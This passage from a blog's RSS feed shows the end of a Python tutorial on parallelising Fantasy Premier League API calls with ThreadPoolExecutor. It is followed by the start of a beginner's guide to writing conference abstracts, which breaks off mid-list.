&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    player_id &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; player_info[&lt;span style="color:#a5d6ff"&gt;&amp;#39;entry&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    player_name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; player_info[&lt;span style="color:#a5d6ff"&gt;&amp;#39;player_name&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    team_name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; player_info[&lt;span style="color:#a5d6ff"&gt;&amp;#39;entry_name&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    player_query &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; api_url &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;entry/&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; str(player_id) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;/history&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    player_response &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;get(player_query)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    player_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; json&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;loads(player_response&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;text)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    &lt;span style="color:#8b949e;font-style:italic"&gt;# Create DataFrame for this player&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    player_df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;DataFrame({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        &lt;span style="color:#a5d6ff"&gt;&amp;#39;name&amp;#39;&lt;/span&gt;: player_name,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        &lt;span style="color:#a5d6ff"&gt;&amp;#39;team_name&amp;#39;&lt;/span&gt;: team_name,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        &lt;span style="color:#a5d6ff"&gt;&amp;#39;event&amp;#39;&lt;/span&gt;: pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;json_normalize(player_data[&lt;span style="color:#a5d6ff"&gt;&amp;#39;current&amp;#39;&lt;/span&gt;])[&lt;span style="color:#a5d6ff"&gt;&amp;#39;event&amp;#39;&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        &lt;span style="color:#a5d6ff"&gt;&amp;#39;points&amp;#39;&lt;/span&gt;: pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;json_normalize(player_data[&lt;span style="color:#a5d6ff"&gt;&amp;#39;current&amp;#39;&lt;/span&gt;])[&lt;span style="color:#a5d6ff"&gt;&amp;#39;total_points&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; player_df
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;I will also need to adapt how I iterate over the player data. I know I&amp;rsquo;ve already switched from &lt;code&gt;iterrows&lt;/code&gt; to
a for loop over a zip of the relevant data, but the new function will use a different method of iteration. So
I am creating a list of &amp;lsquo;records&amp;rsquo; dictionaries (one per player), each of which I can pass directly to my new &lt;code&gt;get_player_data&lt;/code&gt;
function.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;players &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; league[[&lt;span style="color:#a5d6ff"&gt;&amp;#39;entry&amp;#39;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#39;player_name&amp;#39;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#39;entry_name&amp;#39;&lt;/span&gt;]]&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;to_dict(&lt;span style="color:#a5d6ff"&gt;&amp;#39;records&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Next comes the &lt;code&gt;ThreadPoolExecutor&lt;/code&gt;, which is what allows us to run multiple API calls at once. It lets us
create a pool of Python threads (workers) and send work to them. I will first initialise an empty list to
write my player DataFrames to. Then I&amp;rsquo;ll use &lt;code&gt;ThreadPoolExecutor(max_workers=10)&lt;/code&gt; to create a pool of up to 10 workers
that we can send work to (I am using 10 as an example; this will be an argument the user can change in
the final function). &lt;code&gt;executor&lt;/code&gt; is the object used to send work to the workers. I can use &lt;code&gt;executor.map&lt;/code&gt;
to map &lt;code&gt;get_player_data&lt;/code&gt; over the &lt;code&gt;players&lt;/code&gt; list and save the output to our initialised list.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;concurrent.futures&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; ThreadPoolExecutor
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;get_season_league&lt;/span&gt;(league_id &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;485842&amp;#34;&lt;/span&gt;):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    &lt;span style="color:#8b949e;font-style:italic"&gt;# ...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    player_dfs &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; []
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    &lt;span style="color:#ff7b72"&gt;with&lt;/span&gt; ThreadPoolExecutor(max_workers&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;) &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; executor:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        results &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; executor&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;map(get_player_data, players)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        player_dfs &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; list(results)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Finally, we apply the change mentioned above and call &lt;code&gt;pd.concat&lt;/code&gt; once at the end, rather than
once per player.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;concat(player_dfs, ignore_index&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;True&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;So our final function will look like this, with &lt;code&gt;get_player_data&lt;/code&gt; defined inside &lt;code&gt;get_season_league&lt;/code&gt; so
that &lt;code&gt;api_url&lt;/code&gt; is available:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;get_season_league&lt;/span&gt;(league_id&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;485842&amp;#34;&lt;/span&gt;, max_workers&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    api_url &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;https://fantasy.premierleague.com/api/&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    url &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; api_url &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;leagues-classic/&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; league_id &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;/standings/&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    response &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;get(url)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; json&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;loads(response&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;text)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    league &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;DataFrame(data[&lt;span style="color:#a5d6ff"&gt;&amp;#39;standings&amp;#39;&lt;/span&gt;][&lt;span style="color:#a5d6ff"&gt;&amp;#39;results&amp;#39;&lt;/span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    &lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;get_player_data&lt;/span&gt;(player_info):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&amp;#34;Fetch data for a single player and return as DataFrame&amp;#34;&amp;#34;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        player_id &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; player_info[&lt;span style="color:#a5d6ff"&gt;&amp;#39;entry&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        player_name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; player_info[&lt;span style="color:#a5d6ff"&gt;&amp;#39;player_name&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        team_name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; player_info[&lt;span style="color:#a5d6ff"&gt;&amp;#39;entry_name&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        player_query &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; api_url &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;entry/&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; str(player_id) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;/history&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        player_response &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;get(player_query)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        player_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; json&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;loads(player_response&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;text)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        &lt;span style="color:#8b949e;font-style:italic"&gt;# Create DataFrame for this player&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        player_df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;DataFrame({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;            &lt;span style="color:#a5d6ff"&gt;&amp;#39;name&amp;#39;&lt;/span&gt;: player_name,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;            &lt;span style="color:#a5d6ff"&gt;&amp;#39;team_name&amp;#39;&lt;/span&gt;: team_name,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;            &lt;span style="color:#a5d6ff"&gt;&amp;#39;event&amp;#39;&lt;/span&gt;: pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;json_normalize(player_data[&lt;span style="color:#a5d6ff"&gt;&amp;#39;current&amp;#39;&lt;/span&gt;])[&lt;span style="color:#a5d6ff"&gt;&amp;#39;event&amp;#39;&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;            &lt;span style="color:#a5d6ff"&gt;&amp;#39;points&amp;#39;&lt;/span&gt;: pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;json_normalize(player_data[&lt;span style="color:#a5d6ff"&gt;&amp;#39;current&amp;#39;&lt;/span&gt;])[&lt;span style="color:#a5d6ff"&gt;&amp;#39;total_points&amp;#39;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; player_df
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    players &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; league[[&lt;span style="color:#a5d6ff"&gt;&amp;#39;entry&amp;#39;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#39;player_name&amp;#39;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#39;entry_name&amp;#39;&lt;/span&gt;]]&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;to_dict(&lt;span style="color:#a5d6ff"&gt;&amp;#39;records&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    player_dfs &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; []
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    &lt;span style="color:#ff7b72"&gt;with&lt;/span&gt; ThreadPoolExecutor(max_workers&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;max_workers) &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; executor:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        results &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; executor&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;map(get_player_data, players)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;        player_dfs &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; list(results)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;concat(player_dfs, ignore_index&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;True&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;    &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; df
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;When I run the function on the league of 50, it now takes ~1.5 seconds rather than the original ~13 seconds.&lt;/p&gt;
&lt;h2 id="summary"&gt;Summary&lt;/h2&gt;
&lt;p&gt;So we&amp;rsquo;ve optimised the function to a good degree, first with a few adjustments to the original function, then by using multiple
threads to run API calls at the same time. There are still some things left on the table, like using &lt;code&gt;asyncio&lt;/code&gt;
instead, or even &lt;code&gt;executor.submit()&lt;/code&gt; to have more control over the individual player queries (handling errors etc.). So
perhaps in a future blog we will look at speeding the function up a little bit more.&lt;/p&gt;
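&lt;p&gt;As a taste of what &lt;code&gt;executor.submit()&lt;/code&gt; would offer, here is a minimal sketch with per-player error handling. &lt;code&gt;fetch_points&lt;/code&gt; is a hypothetical stand-in for &lt;code&gt;get_player_data&lt;/code&gt; that fails for one ID on purpose, so no real API calls are made.&lt;/p&gt;

```python
from concurrent.futures import ThreadPoolExecutor, as_completed


def fetch_points(player_id):
    """Hypothetical stand-in for get_player_data; fails for one ID on purpose."""
    if player_id == 3:
        raise ValueError("no data for player 3")
    return {"entry": player_id, "points": player_id * 10}


player_ids = [1, 2, 3, 4]
results, failures = [], {}

with ThreadPoolExecutor(max_workers=4) as executor:
    # submit() returns one Future per call, so each query can be tracked separately
    futures = {executor.submit(fetch_points, pid): pid for pid in player_ids}
    for future in as_completed(futures):
        pid = futures[future]
        try:
            results.append(future.result())
        except ValueError as err:
            # One failed query no longer stops the whole run
            failures[pid] = str(err)

# as_completed yields futures in finish order, so sort for a stable result
results.sort(key=lambda row: row["entry"])
print(results)
print(failures)
```

&lt;p&gt;With &lt;code&gt;executor.map&lt;/code&gt;, the first exception is raised when its result is reached and the remaining results are lost; collecting failures separately keeps the data for the players that did succeed.&lt;/p&gt;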
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/python-package-part-three/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Beginner’s Guide to Submitting Conference Abstracts</title><link>https://www.jumpingrivers.com/blog/beginners-guide-conference-abstracts/</link><pubDate>Tue, 02 Dec 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/beginners-guide-conference-abstracts/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/beginners-guide-conference-abstracts/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/beginners-guide-conference-abstracts/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Submitting a conference abstract can feel intimidating, especially if it
is your first time. Most people worry about whether their topic is good
enough, whether their experience is &amp;ldquo;senior enough&amp;rdquo;, or if they are even
writing the abstract the &amp;ldquo;right&amp;rdquo; way.&lt;/p&gt;
&lt;p&gt;The truth is that most conferences want a wide range of voices.
Organisers want speakers who can explain something clearly, not speakers
with the fanciest job titles. This guide will walk you through:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;what an abstract is&lt;/li&gt;
&lt;li&gt;how to write one&lt;/li&gt;
&lt;li&gt;what reviewers look for&lt;/li&gt;
&lt;li&gt;where you can submit your first talk&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote&gt;
&lt;p&gt;If you are looking for a place to start, we are accepting submissions
for &lt;a href="https://ai-in-production.jumpingrivers.com/" rel="external"&gt;&lt;strong&gt;AI in Production
2026&lt;/strong&gt;&lt;/a&gt; until &lt;strong&gt;23
January&lt;/strong&gt;. More details are at the end of this post.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="what-is-a-conference-abstract"&gt;What is a conference abstract?&lt;/h2&gt;
&lt;p&gt;An &lt;strong&gt;abstract&lt;/strong&gt; is a short summary of what you want to talk about. It
tells reviewers:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;what the topic is&lt;/li&gt;
&lt;li&gt;why it matters&lt;/li&gt;
&lt;li&gt;what the audience will learn&lt;/li&gt;
&lt;li&gt;how you plan to deliver it&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;It does not need to be perfect prose. It just needs to be &lt;strong&gt;clear&lt;/strong&gt;.&lt;/p&gt;
&lt;h2 id="you-are-qualified-to-speak-yes-you"&gt;You are qualified to speak (yes, you)&lt;/h2&gt;
&lt;p&gt;You do not have to be the world’s leading expert on something to speak
about it. Some of the best talks come from people explaining what they
learned while building, fixing, or reviewing a system.&lt;/p&gt;
&lt;p&gt;Choose something you understand well enough to explain without jargon.
For example:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;a project you worked on&lt;/li&gt;
&lt;li&gt;a problem your team solved&lt;/li&gt;
&lt;li&gt;a lesson you learned along the way&lt;/li&gt;
&lt;li&gt;a method, tool, or approach you wish you had known sooner&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If you can explain &lt;strong&gt;why we did it&lt;/strong&gt; and &lt;strong&gt;what we discovered&lt;/strong&gt;, you
have a potential talk.&lt;/p&gt;
&lt;p&gt;Conferences welcome new speakers. You only need:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;something useful to explain&lt;/li&gt;
&lt;li&gt;a clear abstract&lt;/li&gt;
&lt;li&gt;willingness to share your experience&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If you have never spoken before, say so. Reviewers appreciate honesty
and fresh perspectives.&lt;/p&gt;
&lt;h2 id="how-to-write-your-abstract"&gt;How to write your abstract&lt;/h2&gt;
&lt;p&gt;Most conferences ask for around 200 to 250 words. Some ask for even
fewer. Here is a simple structure that works.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Set the context&lt;/strong&gt;&lt;br&gt;
One sentence that explains the setting or problem.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Explain what you did&lt;/strong&gt;&lt;br&gt;
Was it a system you built, a model you deployed, or an analysis you
improved?&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Highlight what the audience will learn&lt;/strong&gt;&lt;br&gt;
Reviewers want to know what people will take away.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Keep the language clear&lt;/strong&gt;&lt;br&gt;
Avoid buzzwords and complicated claims. Good abstracts are
straightforward.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h3 id="a-short-example"&gt;A short example&lt;/h3&gt;
&lt;blockquote&gt;
&lt;p&gt;Our team needed a way to monitor model drift across multiple
deployments. I will share the steps we took, the checks we added, and
the mistakes we made on the way. Attendees will leave with practical
checks they can add to their own model monitoring process.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;You can adapt this pattern for your own work:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;one sentence for the problem&lt;/li&gt;
&lt;li&gt;one or two sentences for what you did&lt;/li&gt;
&lt;li&gt;one sentence for what people will learn&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="practical-tips"&gt;Practical tips&lt;/h2&gt;
&lt;h3 id="choose-your-format"&gt;Choose your format&lt;/h3&gt;
&lt;p&gt;Most conferences offer at least two formats:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Lightning talks&lt;/strong&gt; (around 5 to 6 minutes)&lt;br&gt;
Good for one focused idea, a small tool, or a single lesson.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Standard talks&lt;/strong&gt; (around 20 to 25 minutes)&lt;br&gt;
Better for a full story that includes context, process, and
outcomes.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If you are unsure which to pick, choose the standard slot. Reviewers
often adjust formats based on the strength of the topic.&lt;/p&gt;
&lt;h3 id="show-who-benefits"&gt;Show who benefits&lt;/h3&gt;
&lt;p&gt;At the end of your abstract, add a simple sentence such as:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&amp;ldquo;This talk is suited for engineers working with deployment and
monitoring.&amp;rdquo;&lt;/li&gt;
&lt;li&gt;&amp;ldquo;This talk will help data scientists who want a clearer approach to
evaluation.&amp;rdquo;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This makes it easier for reviewers to place your talk in the programme
and helps attendees decide whether it is relevant for them.&lt;/p&gt;
&lt;h2 id="what-reviewers-look-for"&gt;What reviewers look for&lt;/h2&gt;
&lt;p&gt;Reviewers often focus on three questions.&lt;/p&gt;
&lt;h3 id="is-the-topic-clear"&gt;Is the topic clear?&lt;/h3&gt;
&lt;p&gt;Can they understand what you are talking about &lt;strong&gt;without&lt;/strong&gt; insider
knowledge of your company or project?&lt;/p&gt;
&lt;p&gt;Avoid internal code names or acronyms only your team uses.&lt;/p&gt;
&lt;h3 id="will-the-audience-learn-something-useful"&gt;Will the audience learn something useful?&lt;/h3&gt;
&lt;p&gt;Strong abstracts make it obvious what attendees will take away. They
often include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;concrete examples&lt;/li&gt;
